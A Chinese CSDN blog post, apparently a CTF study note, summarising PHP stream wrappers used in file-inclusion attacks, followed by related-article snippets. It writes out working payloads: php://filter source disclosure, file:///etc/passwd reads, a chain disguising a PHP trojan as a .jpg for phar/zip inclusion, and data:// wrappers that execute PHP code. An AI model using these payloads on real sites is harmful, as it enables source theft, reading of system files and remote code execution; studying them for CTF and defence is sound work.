php伪协议漏洞_PHP伪协议在CTF中的应用

最新推荐文章于 2024-08-11 15:19:49 发布
最新推荐文章于 2024-08-11 15:19:49 发布
阅读量286 收藏
点赞数
文章标签: php伪协议漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29149245/article/details/113476060
版权
本文详细介绍了PHP伪协议在CTF比赛中的应用,包括php://、file://、phar://、zlib://和data://等协议。讨论了PHP版本、%00截断、allow_url_fopen和allow_url_include配置对这些协议的影响,以及如何利用它们进行文件包含、文件读取和命令执行等。例如,php://filter用于读取源代码,file://协议不受allow_url_fopen和allow_url_include限制,而phar://常用于文件上传漏洞的利用。
摘要由CSDN通过智能技术生成

PHP伪协议在CTF中经常出现,也经常跟文件包含,文件上传,命令执行等漏洞结合在一起,所以本文章对常见的一些协议进行总结。

文件包含是否支持%00截断取决于:

PHP版本<=5.2 可以使用%00进行截断。

php支持的伪协议有:

php:// — 访问各个输入/输出流(I/O streams)

file:// — 访问本地文件系统

phar:// — PHP 归档

zlib:// — 压缩流

data:// — 数据(RFC 2397)

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

glob:// — 查找匹配的文件路径模式

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

1.php://协议

php://filter

php://input

allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,主要用于读取源代码并进行base64编码输出。

payload如下:

php://filter/read=convert.base64-encode/resource=upload.php

php://input内容(POST),需要开启allow_url_include,并且当enctype=”multipart/form-data”的时候 php://input是无效的。 例子一

2.file://协议

file://:用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include影响,file://还经常和curl函数(SSRF)结合在一起。例子一,例子二

使用方法:

file:// [文件的绝对路径和文件名]

file:///etc/passwd

...

3.phar://协议

phar://:PHP 归档,常常跟文件包含,文件上传结合着考察。当文件上传仅仅校验mime类型与文件后缀,可以通过以下命令进行利用。例子一

nac.php(木马)->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php

4.zlib://协议

zip://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:

file.php?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]

file.php?file=zip://nac.jpg#nac.php 其中get请求中#需要进行编码,即%23

bzip2://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:

file.php?file=compress.bzip2://nac.bz2

file.php?file=compress.bzip2://./nac.jpg

file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

zlib://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用,使用如下:

file.php?file=compress.zlib://file.gz

file.php?file=compress.zlib://./nac.jpg

file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

5.data://协议

data://:需满足allow_url_fopen,allow_url_include同时开启才能使用,使用如下:

file.php?file=data://text/plain,<?php phpinfo()?>

file.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

file.php?file=data:text/plain,<?php phpinfo()?>

file.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

LINK:

Apple Ringo
关注
ctfphp伪协议的使用
一只菜鸟呀的博客
05-20 1421
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
ctf-试试协议吧(PHP伪协议
qq_29566629的博客
02-10 711
ctf经常用到伪协议,其使用的先决条件如下: allow_url_fopen和allow_url_include都设置为on 源代码里有include: 常用的伪协议有两种: 一、php://filter 作用是读取源码 http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php 二、php://input 可以访问请求的原始数据的只读流, 将post请求的数据作为PHP代码执行
PHP伪协议学习笔记CTF入门
最新发布
流云凝荷的博客一个
08-11 774
一篇学习笔记记录下入门CTF所学的PHP伪协议PHP伪协议是一种特殊的系统访问协议,可用于访问和操作不同类型的资源,如文件、网络资源以及PHP的内部流。
NSSCTF刷题笔记web3——[SWPUCTF 2021 新生赛]include
qq_45692883的博客
01-18 549
考点是,绕过php文件被包裹会当做后端语言执行,需要通过伪协议base64加密的方式提取出来。代码如上,没有做任何的过滤。
ctf常用的PHP伪协议
weixin_35756637的博客
01-02 777
CTF比赛,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器执行PHP代码,例如:...
CTFctf用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 3192
ctf用到的php伪协议总结及例题
php伪协议漏洞_CTF遇见的PHP伪协议运用,ctfphp伪协议
weixin_39843847的博客
01-17 623
CTF遇见的PHP伪协议运用,ctfphp伪协议关于PHP伪协议的总结网上已经有很多文章了LoRexxar的PHP伪协议总结PHP伪协议官方文档以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结php://inputphp://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。注:enctype=”multipart/form...
php伪协议漏洞_include(文件包含漏洞php伪协议)
weixin_39935257的博客
01-17 1096
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
PHP 伪协议大总结.docx
02-24
### PHP 伪协议详解 #### 一、概述 在探讨PHP伪协议之前,我们先来了解下...因此,在实际应用,我们需要充分理解这些协议的原理及其背后的安全考量,确保既能够充分利用这些工具的优势,又能够避免可能的安全漏洞
PHP伪协议
weixin_49472648的博客
08-30 1323
file:// 用于访问本地文件系统,在CTF通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响作用:是php独有的一种协议,它是一种过滤器,可以作为一个间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。语法:php://filter/过滤器|过滤器.........
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议漏洞
m0_60732644的博客
04-08 609
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
文件源码读取 php伪协议,include(文件包含漏洞php伪协议)
weixin_39969257的博客
03-18 933
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php得到base64加密后的flag...
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议
等风来
07-31 4669
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)获取原始的输入数据。
ctfphp伪协议,ctf常见的php伪协议应用
weixin_39949776的博客
03-29 685
ctf常见的php伪协议应用0x01 知识储备php支持的协议和封装协议可以看http://php.net/manual/zh/wrappers.php,大致有12种,总结了一些真实漏洞ctf比赛常出现的案例,发现其用的最多的四种是:php://、data://、zlib://、phar://三个白帽payload:php://filter/write=convert.base64-dec...
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 1510
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9936
PHP 语言一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统的文件,可以在 web 页面链接到本地文件,或者读取本地文件的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
浅析PHP伪协议CTF应用
weixin_33725239的博客
11-22 472
PHP支持的伪协议如下: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ...
CTF fuzz 文件包含 php伪协议
baynk的博客
03-22 1230
一开始就需要fuzz。 先随意构造两个参数,丢到burpsuite,构造两个是因为跑得快些。。。 这里模式记得换下,用Pitchfork,fuzz的地方也不要用错了。 第一个payload值。 第二个payload值 gogogo等结果吧。 路径应该是path了。。。 确实是OK的,那这里用php伪协议来找文件路径了。 本来想用php://input读目录文件的,但是好像有点问题,所...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值